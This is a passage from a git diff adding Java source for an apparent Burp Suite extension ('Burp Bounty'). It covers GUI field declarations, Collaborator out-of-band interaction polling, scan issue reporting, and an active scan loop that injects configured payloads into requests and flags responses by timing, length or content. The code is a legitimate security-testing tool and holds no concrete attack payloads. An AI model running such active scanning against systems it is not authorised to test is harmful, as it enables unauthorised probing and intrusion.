+ private javax.swing.JCheckBox header_tags;
+ private javax.swing.JTabbedPane headerstab;
+ private javax.swing.JCheckBox initial_body_content;
+ private javax.swing.JCheckBox input_image_labels;
+ private javax.swing.JCheckBox input_submit_labels;
+ private javax.swing.JRadioButton invariationsRadio;
+ private javax.swing.JButton jButton1;
+ private javax.swing.JButton jButton10;
+ private javax.swing.JButton jButton11;
+ private javax.swing.JButton jButton12;
+ private javax.swing.JButton jButton13;
+ private javax.swing.JButton jButton2;
+ private javax.swing.JButton jButton3;
+ private javax.swing.JButton jButton4;
+ private javax.swing.JButton jButton5;
+ private javax.swing.JButton jButton6;
+ private javax.swing.JButton jButton7;
+ private javax.swing.JButton jButton8;
+ private javax.swing.JButton jButton9;
+ private javax.swing.JCheckBoxMenuItem jCheckBoxMenuItem1;
+ private javax.swing.JLabel jLabel1;
+ private javax.swing.JLabel jLabel10;
+ private javax.swing.JLabel jLabel11;
+ private javax.swing.JLabel jLabel12;
+ private javax.swing.JLabel jLabel13;
+ private javax.swing.JLabel jLabel14;
+ private javax.swing.JLabel jLabel15;
+ private javax.swing.JLabel jLabel16;
+ private javax.swing.JLabel jLabel17;
+ private javax.swing.JLabel jLabel18;
+ private javax.swing.JLabel jLabel19;
+ private javax.swing.JLabel jLabel2;
+ private javax.swing.JLabel jLabel22;
+ private javax.swing.JLabel jLabel23;
+ private javax.swing.JLabel jLabel24;
+ private javax.swing.JLabel jLabel25;
+ private javax.swing.JLabel jLabel26;
+ private javax.swing.JLabel jLabel27;
+ private javax.swing.JLabel jLabel28;
+ private javax.swing.JLabel jLabel29;
+ private javax.swing.JLabel jLabel3;
+ private javax.swing.JLabel jLabel30;
+ private javax.swing.JLabel jLabel31;
+ private javax.swing.JLabel jLabel32;
+ private javax.swing.JLabel jLabel33;
+ private javax.swing.JLabel jLabel34;
+ private javax.swing.JLabel jLabel35;
+ private javax.swing.JLabel jLabel36;
+ private javax.swing.JLabel jLabel37;
+ private javax.swing.JLabel jLabel38;
+ private javax.swing.JLabel jLabel39;
+ private javax.swing.JLabel jLabel4;
+ private javax.swing.JLabel jLabel40;
+ private javax.swing.JLabel jLabel41;
+ private javax.swing.JLabel jLabel42;
+ private javax.swing.JLabel jLabel43;
+ private javax.swing.JLabel jLabel44;
+ private javax.swing.JLabel jLabel45;
+ private javax.swing.JLabel jLabel46;
+ private javax.swing.JLabel jLabel47;
+ private javax.swing.JLabel jLabel48;
+ private javax.swing.JLabel jLabel49;
+ private javax.swing.JLabel jLabel5;
+ private javax.swing.JLabel jLabel52;
+ private javax.swing.JLabel jLabel53;
+ private javax.swing.JLabel jLabel54;
+ private javax.swing.JLabel jLabel55;
+ private javax.swing.JLabel jLabel6;
+ private javax.swing.JLabel jLabel7;
+ private javax.swing.JLabel jLabel8;
+ private javax.swing.JLabel jLabel9;
+ private javax.swing.JMenuItem jMenuItem1;
+ private javax.swing.JPanel jPanel1;
+ private javax.swing.JPanel jPanel10;
+ private javax.swing.JPanel jPanel11;
+ private javax.swing.JPanel jPanel12;
+ private javax.swing.JPanel jPanel2;
+ private javax.swing.JPanel jPanel3;
+ private javax.swing.JPanel jPanel4;
+ private javax.swing.JScrollPane jScrollPane1;
+ private javax.swing.JScrollPane jScrollPane10;
+ private javax.swing.JScrollPane jScrollPane11;
+ private javax.swing.JScrollPane jScrollPane13;
+ private javax.swing.JScrollPane jScrollPane14;
+ private javax.swing.JScrollPane jScrollPane2;
+ private javax.swing.JScrollPane jScrollPane3;
+ private javax.swing.JScrollPane jScrollPane4;
+ private javax.swing.JScrollPane jScrollPane5;
+ private javax.swing.JScrollPane jScrollPane6;
+ private javax.swing.JScrollPane jScrollPane7;
+ private javax.swing.JScrollPane jScrollPane8;
+ private javax.swing.JScrollPane jScrollPane9;
+ private javax.swing.JSeparator jSeparator10;
+ private javax.swing.JSeparator jSeparator11;
+ private javax.swing.JSeparator jSeparator12;
+ private javax.swing.JSeparator jSeparator2;
+ private javax.swing.JSeparator jSeparator3;
+ private javax.swing.JSeparator jSeparator4;
+ private javax.swing.JSeparator jSeparator5;
+ private javax.swing.JSeparator jSeparator6;
+ private javax.swing.JSeparator jSeparator7;
+ private javax.swing.JSeparator jSeparator8;
+ private javax.swing.JSeparator jSeparator9;
+ private javax.swing.JTabbedPane jTabbedPane2;
+ private javax.swing.JTabbedPane jtabpane;
+ private javax.swing.JCheckBox last_modified_header;
+ private javax.swing.JCheckBox limited_body_content;
+ private javax.swing.JCheckBox line_count;
+ private javax.swing.JList list1;
+ private javax.swing.JList list2;
+ public javax.swing.JList list3;
+ public javax.swing.JList listtag;
+ public javax.swing.JList listtagmanager;
+ private javax.swing.JCheckBox location;
+ private javax.swing.JCheckBox negativeCT;
+ private javax.swing.JCheckBox negativeRC;
+ private javax.swing.JComboBox newTagCombo;
+ private javax.swing.JComboBox newTagCombo2;
+ private javax.swing.JButton newTagb;
+ private javax.swing.JCheckBox non_hidden_form_input_types;
+ private javax.swing.JCheckBox onlyhttp;
+ private javax.swing.JCheckBox outbound_edge_count;
+ private javax.swing.JCheckBox outbound_edge_tag_names;
+ private javax.swing.JCheckBox page_title;
+ private javax.swing.JCheckBox paramamf;
+ private javax.swing.JCheckBox parambody;
+ private javax.swing.JCheckBox paramcookie;
+ private javax.swing.JCheckBox paramjson;
+ private javax.swing.JCheckBox parammultipartattr;
+ private javax.swing.JCheckBox paramnamebody;
+ private javax.swing.JCheckBox paramnameurl;
+ private javax.swing.JCheckBox paramurl;
+ private javax.swing.JCheckBox paramxml;
+ private javax.swing.JCheckBox paramxmlattr;
+ private javax.swing.JRadioButton radio1;
+ private javax.swing.JRadioButton radio10;
+ private javax.swing.JRadioButton radio11;
+ private javax.swing.JRadioButton radio12;
+ private javax.swing.JRadioButton radio2;
+ private javax.swing.JRadioButton radio22;
+ private javax.swing.JRadioButton radio3;
+ private javax.swing.JRadioButton radio4;
+ private javax.swing.JRadioButton radio5;
+ private javax.swing.JRadioButton radio6;
+ private javax.swing.JRadioButton radio7;
+ private javax.swing.JRadioButton radio8;
+ private javax.swing.JRadioButton radio9;
+ private javax.swing.JRadioButton radioPR;
+ private javax.swing.JRadioButton radiocl;
+ private javax.swing.JRadioButton radiotime;
+ private javax.swing.JRadioButton rb1;
+ private javax.swing.JRadioButton rb2;
+ private javax.swing.JRadioButton rb3;
+ private javax.swing.JRadioButton rb4;
+ private javax.swing.JButton removetag;
+ private javax.swing.JRadioButton replace;
+ private javax.swing.JCheckBox set_cookie_names;
+ private javax.swing.JSpinner sp1;
+ private javax.swing.JCheckBox status_code;
+ private javax.swing.JTable table;
+ private javax.swing.JTable table1;
+ private javax.swing.JTable table2;
+ private javax.swing.JTable table4;
+ private javax.swing.JCheckBox tag_ids;
+ private javax.swing.JCheckBox tag_names;
+ private javax.swing.JTextField text1;
+ private javax.swing.JTextField text11;
+ private javax.swing.JTextField text4;
+ private javax.swing.JTextField text5;
+ private javax.swing.JTextField text71;
+ private javax.swing.JTextField text72;
+ private javax.swing.JTextArea textarea1;
+ private javax.swing.JTextArea textarea2;
+ private javax.swing.JTextArea textarea3;
+ private javax.swing.JTextArea textarea4;
+ private javax.swing.JTextField textauthor;
+ private javax.swing.JTextField textcl;
+ private javax.swing.JTextField textfield1;
+ private javax.swing.JTextField textfield2;
+ private javax.swing.JTextField textgreps;
+ private javax.swing.JTextField textpayloads;
+ private javax.swing.JTextField texttime;
+ private javax.swing.JCheckBox unknown;
+ private javax.swing.JCheckBox urlpathfilename;
+ private javax.swing.JCheckBox urlpathfolder;
+ private javax.swing.JCheckBox userprovided;
+ private javax.swing.JRadioButton variationsRadio;
+ private javax.swing.JCheckBox visible_text;
+ private javax.swing.JCheckBox visible_word_count;
+ private javax.swing.JCheckBox whole_body_content;
+ private javax.swing.JCheckBox word_count;
+ // End of variables declaration//GEN-END:variables
+}
diff --git a/src/BurpCollaboratorThread.java b/src/BurpCollaboratorThread.java
new file mode 100644
index 0000000..68734f4
--- /dev/null
+++ b/src/BurpCollaboratorThread.java
@@ -0,0 +1,132 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpCollaboratorClientContext;
+import burp.IBurpCollaboratorInteraction;
+import burp.IBurpExtenderCallbacks;
+import burp.IExtensionHelpers;
+import burp.IHttpRequestResponse;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Properties;
+
+public class BurpCollaboratorThread extends Thread {
+
+ private IBurpExtenderCallbacks callbacks;
+ private IExtensionHelpers helpers;
+ public List CollaboratorClientContext;
+ HashMap ccrequestResponse;
+ HashMap issues;
+ public boolean doStop;
+ Properties issueProperties;
+ private String issuename;
+ private String issuedetail;
+ private String issuebackground;
+ private String remediationdetail;
+ private String remediationbackground;
+ private String issueseverity;
+ private String issueconfidence;
+ CollaboratorData burpCollaboratorData;
+
+ public BurpCollaboratorThread(IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData) {
+ this.callbacks = callbacks;
+ helpers = callbacks.getHelpers();
+ this.burpCollaboratorData = burpCollaboratorData;
+ CollaboratorClientContext = new ArrayList();
+ ccrequestResponse = new HashMap();
+ issues = new HashMap();
+ doStop = false;
+ issueProperties = new Properties();
+ issuename = "";
+ issuedetail = "";
+ issuebackground = "";
+ remediationdetail = "";
+ remediationbackground = "";
+ issueseverity = "";
+ issueconfidence = "";
+
+ }
+
+ public void doStop() {
+ doStop = true;
+ }
+
+ public boolean keepRunning() {
+ return doStop == false;
+ }
+
+ @Override
+ public void run() {
+ while (keepRunning()) {
+ CollaboratorClientContext = burpCollaboratorData.getCollaboratorClientContext();
+ try {
+ for (int client = 0; client < CollaboratorClientContext.size(); client++) {
+ List CollaboratorInteraction = CollaboratorClientContext.get(client).fetchAllCollaboratorInteractions();
+ if (CollaboratorInteraction != null && !CollaboratorInteraction.isEmpty()) {
+ for (int interaction = 0; interaction < CollaboratorInteraction.size(); interaction++) {
+ addIssue(CollaboratorClientContext.get(client), CollaboratorInteraction.get(interaction));
+ }
+ }
+ }
+
+ BurpCollaboratorThread.sleep(10000);
+ } catch (NullPointerException | InterruptedException e) {
+ System.out.println("Thread error: " + e);
+ }
+ }
+ }
+
+ public void addIssue(IBurpCollaboratorClientContext cc, IBurpCollaboratorInteraction interactions) {
+ String interaction_id = interactions.getProperty("interaction_id");
+ String bchost = interaction_id + ".burpcollaborator.net";
+ String type = interactions.getProperty("type");
+ String client_ip = interactions.getProperty("client_ip");
+ String time_stamp = interactions.getProperty("time_stamp");
+ String query_type = interactions.getProperty("query_type");
+ issueProperties = burpCollaboratorData.getIssueProperties(bchost);
+ issuename = issueProperties.getProperty("issuename");
+ issuedetail = issueProperties.getProperty("issuedetail");
+ issuebackground = issueProperties.getProperty("issuebackground");
+ remediationdetail = issueProperties.getProperty("remediationdetail");
+ remediationbackground = issueProperties.getProperty("remediationbackground");
+ issueseverity = issueProperties.getProperty("issueseverity");
+ issueconfidence = issueProperties.getProperty("issueconfidence");
+ issuedetail = issuedetail + "
BurpCollaborator data:
Interaction id: " + interaction_id + "
type: " + type
+ + "
client_ip: " + client_ip + "
time_stamp: " + time_stamp + "
query_type: " + query_type + "
";
+
+ IHttpRequestResponse requestResponse = burpCollaboratorData.getRequestResponse(bchost);
+ List requestMarkers = new ArrayList();
+ int start = 0;
+ byte[] match = helpers.stringToBytes(bchost);
+ byte[] request = requestResponse.getRequest();
+
+ while (start < request.length) {
+ start = helpers.indexOf(request, match, false, start, request.length);
+ if (start == -1) {
+ break;
+ }
+ requestMarkers.add(new int[]{start, start + match.length});
+ start += match.length;
+ }
+
+ callbacks.addScanIssue(new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)}, "BurpBounty - " + issuename,
+ issuedetail, issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground));
+
+ }
+}
diff --git a/src/CollaboratorData.java b/src/CollaboratorData.java
new file mode 100644
index 0000000..540b848
--- /dev/null
+++ b/src/CollaboratorData.java
@@ -0,0 +1,87 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpCollaboratorClientContext;
+import burp.IExtensionHelpers;
+import burp.IHttpRequestResponse;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Properties;
+
+public class CollaboratorData {
+
+ private IExtensionHelpers helpers;
+ private List CollaboratorClientContext;
+ HashMap ccrequestResponse;
+ HashMap issues;
+ Properties issueProperties;
+ private String issuename;
+ private String issuedetail;
+ private String issuebackground;
+ private String remediationdetail;
+ private String remediationbackground;
+ private String issueseverity;
+ private String issueconfidence;
+
+ public CollaboratorData(IExtensionHelpers helpers) {
+ this.helpers = helpers;
+ CollaboratorClientContext = new ArrayList();
+ ccrequestResponse = new HashMap();
+ issues = new HashMap();
+ issueProperties = new Properties();
+ issuename = "";
+ issuedetail = "";
+ issuebackground = "";
+ remediationdetail = "";
+ remediationbackground = "";
+ issueseverity = "";
+ issueconfidence = "";
+ }
+
+ public synchronized void setIssueProperties(IHttpRequestResponse requestResponse, String bchost, String issuename, String issuedetail, String issueseverity, String issueconfidence,
+ String issuebackground, String remediationdetail, String remediationbackground) {
+
+ issueProperties = new Properties();
+ issueProperties.put("issuename", issuename);
+ issueProperties.put("issuedetail", issuedetail);
+ issueProperties.put("issueseverity", issueseverity);
+ issueProperties.put("issueconfidence", issueconfidence);
+ issueProperties.put("issuebackground", issuebackground);
+ issueProperties.put("remediationdetail", remediationdetail);
+ issueProperties.put("remediationbackground", remediationbackground);
+ issues.put(bchost, issueProperties);
+ ccrequestResponse.put(bchost, requestResponse);
+
+ }
+
+ public synchronized Properties getIssueProperties(String bchost) {
+ return issues.get(bchost);
+ }
+
+ public synchronized List getCollaboratorClientContext() {
+ return CollaboratorClientContext;
+ }
+
+ public synchronized void setCollaboratorClientContext(IBurpCollaboratorClientContext bccc) {
+ CollaboratorClientContext.add(bccc);
+ }
+
+ public synchronized IHttpRequestResponse getRequestResponse(String bchost) {
+ return ccrequestResponse.get(bchost);
+ }
+}
diff --git a/src/CustomScanIssue.java b/src/CustomScanIssue.java
new file mode 100644
index 0000000..dcf9bd8
--- /dev/null
+++ b/src/CustomScanIssue.java
@@ -0,0 +1,115 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IHttpRequestResponse;
+import burp.IHttpService;
+import burp.IScanIssue;
+import java.net.URL;
+
+class CustomScanIssue implements IScanIssue {
+
+ private IHttpService httpService;
+ private URL url;
+ private IHttpRequestResponse[] httpMessages;
+ private String name;
+ private String detail;
+ private String severity;
+ private String issueConfidence;
+ private String issueRemediation;
+ private String issueBackground;
+ private String issueClassification;
+
+ public CustomScanIssue(
+ IHttpService httpService,
+ URL url,
+ IHttpRequestResponse[] httpMessages,
+ String name,
+ String detail,
+ String severity,
+ String issueConfidence,
+ String issueRemediation,
+ String issueBackground,
+ String issueClassification) {
+ this.httpService = httpService;
+ this.url = url;
+ this.httpMessages = httpMessages;
+ this.name = name;
+ this.detail = detail;
+ this.severity = severity;
+ this.issueConfidence = issueConfidence;
+ this.issueRemediation = issueRemediation;
+ this.issueBackground = issueBackground;
+ this.issueClassification = issueClassification;
+
+ }
+
+ @Override
+ public URL getUrl() {
+ return url;
+ }
+
+ @Override
+ public String getIssueName() {
+ return name;
+ }
+
+ @Override
+ public int getIssueType() {
+ return 0;
+ }
+
+ @Override
+ public String getSeverity() {
+ return severity;
+ }
+
+ @Override
+ public String getConfidence() {
+ return issueConfidence;
+ }
+
+ @Override
+ public String getIssueBackground() {
+ return issueBackground;
+ }
+
+ @Override
+ public String getRemediationBackground() {
+ return issueRemediation;
+ }
+
+ @Override
+ public String getIssueDetail() {
+ return detail;
+ }
+
+ @Override
+ public String getRemediationDetail() {
+ return issueClassification;
+ }
+
+ @Override
+ public IHttpRequestResponse[] getHttpMessages() {
+ return httpMessages;
+ }
+
+ @Override
+ public IHttpService getHttpService() {
+ return httpService;
+ }
+
+}
diff --git a/src/GenericScan.java b/src/GenericScan.java
new file mode 100644
index 0000000..06b149b
--- /dev/null
+++ b/src/GenericScan.java
@@ -0,0 +1,840 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpCollaboratorClientContext;
+import burp.IBurpExtenderCallbacks;
+import burp.IExtensionHelpers;
+import burp.IHttpRequestResponse;
+import burp.IHttpService;
+import burp.IResponseInfo;
+import burp.IResponseVariations;
+import burp.IScanIssue;
+import burp.IScannerInsertionPoint;
+import com.google.gson.Gson;
+import com.google.gson.JsonArray;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.List;
+import java.net.MalformedURLException;
+import java.net.URL;
+import java.util.Properties;
+import java.util.logging.Level;
+import java.util.logging.Logger;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+public class GenericScan {
+
+ private IBurpExtenderCallbacks callbacks;
+ private IExtensionHelpers helpers;
+ String issuename;
+ String issuedetail;
+ String issuebackground;
+ String remediationdetail;
+ String remediationbackground;
+ String charstourlencode;
+ int scanner;
+ int matchtype;
+ String issueseverity;
+ String issueconfidence;
+ boolean excludeHTTP;
+ boolean onlyHTTP;
+ boolean notresponse;
+ boolean iscontenttype;
+ boolean isresponsecode;
+ boolean negativect;
+ boolean negativerc;
+ String contenttype;
+ String responsecode;
+ boolean casesensitive;
+ boolean urlencode;
+ Integer maxredirect;
+ Integer redirtype;
+ int payloadposition;
+ String timeout;
+ String contentLength;
+ List payloads;
+ List payloadsEncoded;
+ List payloadsenc;
+ List greps;
+ List encoders;
+ JsonArray data;
+ Gson gson;
+ Issue issue;
+ List headers;
+ CollaboratorData burpCollaboratorData;
+ Properties issueProperties;
+ List responses;
+ List variationAttributes;
+ List insertionPointType;
+ Boolean pathDiscovery;
+
+ public GenericScan(IBurpExtenderCallbacks callbacks, JsonArray data, CollaboratorData burpCollaboratorData) {
+
+ this.callbacks = callbacks;
+ helpers = callbacks.getHelpers();
+ this.data = data;
+ this.burpCollaboratorData = burpCollaboratorData;
+ issueProperties = new Properties();
+ gson = new Gson();
+ }
+
+ public List runAScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
+
+ if (helpers.analyzeResponse(baseRequestResponse.getResponse()) == null | helpers.analyzeRequest(baseRequestResponse.getRequest()) == null) {
+ return null;
+ }
+
+ int baseResponseContentLength = getContentLength(baseRequestResponse);
+ List issues = new ArrayList<>();
+ IHttpService httpService = baseRequestResponse.getHttpService();
+ List responseCodes = new ArrayList<>(Arrays.asList(300, 301, 303, 302, 307, 308));
+
+ for (int i = 0; i < data.size(); i++) {
+ responses = new ArrayList();
+ Object idata = data.get(i);
+ issue = gson.fromJson(idata.toString(), Issue.class);
+
+ //if example scanner or passive scanner...continue.
+ scanner = issue.getScanner();
+ if (scanner == 0 || scanner == 2 || scanner == 3 || !issue.getActive()) {
+ continue;
+ }
+
+ //get values from json
+ payloads = issue.getPayloads();
+ greps = issue.getGreps();
+ issuename = issue.getIssueName();
+ issueseverity = issue.getIssueSeverity();
+ issueconfidence = issue.getIssueConfidence();
+ issuedetail = issue.getIssueDetail();
+ issuebackground = issue.getIssueBackground();
+ remediationdetail = issue.getRemediationDetail();
+ remediationbackground = issue.getRemediationBackground();
+ matchtype = issue.getMatchType();
+ notresponse = issue.getNotResponse();
+ casesensitive = issue.getCaseSensitive();
+ encoders = issue.getEncoder();
+ urlencode = issue.getUrlEncode();
+ charstourlencode = issue.getCharsToUrlEncode();
+ iscontenttype = issue.getIsContentType();
+ isresponsecode = issue.getIsResponseCode();
+ contenttype = issue.getContentType();
+ responsecode = issue.getResponseCode();
+ excludeHTTP = issue.getExcludeHTTP();
+ onlyHTTP = issue.getOnlyHTTP();
+ negativect = issue.getNegativeCT();
+ negativerc = issue.getNegativeRC();
+ maxredirect = issue.getMaxRedir();
+ redirtype = issue.getRedirection();
+ payloadposition = issue.getPayloadPosition();
+ timeout = issue.getTime();
+ contentLength = issue.getContentLength();
+ headers = issue.getHeader();
+ variationAttributes = issue.getVariationAttributes();
+ insertionPointType = issue.getInsertionPointType();
+ IScanIssue matches = null;
+ GrepMatch gm = new GrepMatch(callbacks);
+ pathDiscovery = issue.getPathDiscover();
+
+ if (headers == null) {
+ headers = new ArrayList();
+ }
+
+ if (pathDiscovery == null) {
+ pathDiscovery = false;
+ }
+
+ if (variationAttributes == null) {
+ variationAttributes = new ArrayList();
+ }
+
+ if (insertionPointType == null) {
+ insertionPointType = new ArrayList();
+ insertionPointType.add(77);
+ insertionPointType.add(65);
+ insertionPointType.add(32);
+ insertionPointType.add(36);
+ insertionPointType.add(7);
+ insertionPointType.add(1);
+ insertionPointType.add(2);
+ insertionPointType.add(6);
+ insertionPointType.add(33);
+ insertionPointType.add(5);
+ insertionPointType.add(35);
+ insertionPointType.add(34);
+ insertionPointType.add(64);
+ insertionPointType.add(0);
+ insertionPointType.add(3);
+ insertionPointType.add(4);
+ insertionPointType.add(37);
+ insertionPointType.add(127);
+ }
+
+
+ while (greps.contains("")) {//remove void greps, because get auto DOS atack ;)
+ greps.remove(greps.indexOf(""));
+ }
+
+ //If encoders exist...
+ if (!encoders.isEmpty()) {
+ switch (matchtype) {
+ case 1:
+ payloadsEncoded = processPayload(payloads, encoders);
+ payloads = new ArrayList(payloadsEncoded);
+ break;
+ case 2:
+ payloadsEncoded = processPayload(payloads, encoders);
+ payloads = new ArrayList(payloadsEncoded);
+ break;
+ case 3:
+ payloadsEncoded = processPayload(payloads, encoders);
+ greps = payloadsEncoded;
+ payloads = payloadsEncoded;
+ break;
+ case 4:
+ payloadsEncoded = processPayload(payloads, encoders);
+ greps = new ArrayList(payloads);
+ payloads = new ArrayList(payloadsEncoded);
+ break;
+ default:
+ payloadsEncoded = processPayload(payloads, encoders);
+ payloads = new ArrayList(payloadsEncoded);
+ break;
+ }
+
+ } else {
+ if (matchtype == 3) {
+ greps = payloads;
+ }
+ }
+
+ for (String payload : payloads) {
+ String name1 = insertionPoint.getInsertionPointName();
+ Integer a = insertionPoint.getInsertionPointType() & 0xFF;
+ if (!insertionPointType.contains(insertionPoint.getInsertionPointType() & 0xFF)) {
+ break;
+ }
+
+ if (urlencode) {
+ payload = encodeTheseURL(payload, charstourlencode);
+ }
+
+ if (payloadposition == 2) {
+ payload = insertionPoint.getBaseValue().concat(payload);
+ }
+
+ if (!headers.isEmpty()) {
+ for (int x = 0; x < headers.size(); x++) {
+ if (headers.get(x).type.equals("Payload")) {
+ if (headers.get(x).regex.equals("String")) {
+ payload = payload.replace(headers.get(x).match, headers.get(x).replace);
+ } else {
+ payload = payload.replaceAll(headers.get(x).match, headers.get(x).replace);
+ }
+ }
+ }
+ }
+
+ if (payload.contains(" ")) {//for avoid space in payload
+ payload = payload.replace(" ", "+");
+ }
+
+ switch (matchtype) {
+ case 5://Timeout match type
+ {
+ long startTime,endTime,difference = 0;
+ matches = null;
+ IHttpRequestResponse response;
+ try {
+ startTime = System.currentTimeMillis();
+ response = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers));
+ endTime = System.currentTimeMillis();
+ difference = (endTime - startTime);
+ } catch (Exception ex) {
+ break;
+ }
+
+ Integer time = Integer.parseInt(timeout);
+ if (difference >= time * 1000) {
+ matches = new CustomScanIssue(response.getHttpService(), helpers.analyzeRequest(response).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(response, null, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity,
+ issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ }
+ if (matches != null) {
+ issues.add(matches);
+ }
+ break;
+ }
+ case 7://Variations match type
+ case 8://Invariation match type
+ {
+ IHttpRequestResponse requestResponse;
+ matches = null;
+ try {
+ requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers));
+ } catch (Exception ex) {
+ break;
+ }
+ IResponseVariations ipv = helpers.analyzeResponseVariations(baseRequestResponse.getResponse(), requestResponse.getResponse());
+ List var;
+
+ if (matchtype == 7) {
+ var = ipv.getVariantAttributes();
+ } else {
+ var = ipv.getInvariantAttributes();
+ }
+
+ List requestMarkers = new ArrayList();
+ byte[] request = requestResponse.getRequest();
+ if (var.containsAll(variationAttributes)) {
+ int start = 0;
+ byte[] match = helpers.stringToBytes(payload);
+ while (start < request.length) {
+ start = helpers.indexOf(request, match, false, start, request.length);
+ if (start == -1) {
+ break;
+ }
+ requestMarkers.add(new int[]{start, start + match.length});
+ start += match.length;
+ }
+
+ matches = new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity,
+ issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ }
+ if (matches != null) {
+ issues.add(matches);
+ }
+ break;
+ }
+ case 6://Content Length difference match type
+ {
+ IHttpRequestResponse requestResponse;
+ matches = null;
+ try {
+ requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers));
+ } catch (Exception ex) {
+ break;
+ }
+ int currentResponseContentLength = getContentLength(requestResponse);
+ if (Math.abs(baseResponseContentLength - currentResponseContentLength) > Integer.parseInt(contentLength)) {
+ List responseMarkers = new ArrayList(1);
+ String grep = "CONTENT-LENGTH:";
+ responseMarkers.add(new int[]{helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep),
+ helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep) + grep.length()});
+
+ matches = new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(),
+ new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, null, responseMarkers)},
+ "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(grep)), issueseverity,
+ issueconfidence, remediationdetail, issuebackground, remediationbackground);
+ }
+ if (matches != null) {//posar matches=null al principi de dins de cada if
+ issues.add(matches);
+ }
+ break;
+ }
+ default://String, Regex, Payload, Payload without encode match types
+
+ if (payload.contains("{BC}")) {
+ IBurpCollaboratorClientContext CollaboratorClientContext = callbacks.createBurpCollaboratorClientContext();
+
+ burpCollaboratorData.setCollaboratorClientContext(CollaboratorClientContext);
+ String bchost = CollaboratorClientContext.generatePayload(true);
+ payload = payload.replace("{BC}", bchost);
+ IHttpRequestResponse requestResponse;
+ IResponseInfo r;
+ try {
+ requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers));
+ } catch (Exception ex) {
+ break;
+ }
+ burpCollaboratorData.setIssueProperties(requestResponse, bchost, issuename, issuedetail, issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground);
+
+ try {
+ r = helpers.analyzeResponse(requestResponse.getResponse());
+ } catch (NullPointerException e) {
+ break;
+ }
+
+ Integer responseCode = new Integer(r.getStatusCode());
+ int redirect = 0;
+
+ while (responseCodes.contains(responseCode) && redirect < 30) {
+ r = helpers.analyzeResponse(requestResponse.getResponse());
+ responseCode = new Integer(r.getStatusCode());
+ requestResponse = getRedirection(requestResponse, payload, httpService);
+ if (requestResponse == null) {
+ break;
+ }
+ redirect += 1;
+ }
+
+ } else {
+ IHttpRequestResponse requestResponse;
+ try {
+ requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers));
+ } catch (Exception ex) {
+ break;
+ }
+
+ if (requestResponse.getResponse() == null) {
+ break;
+ }
+
+ IResponseInfo r;
+ Integer responseCode;
+ if (redirtype != 1) {
+ Integer loop = 0;
+
+ if (maxredirect > 50) {
+ maxredirect = 50;
+ }
+
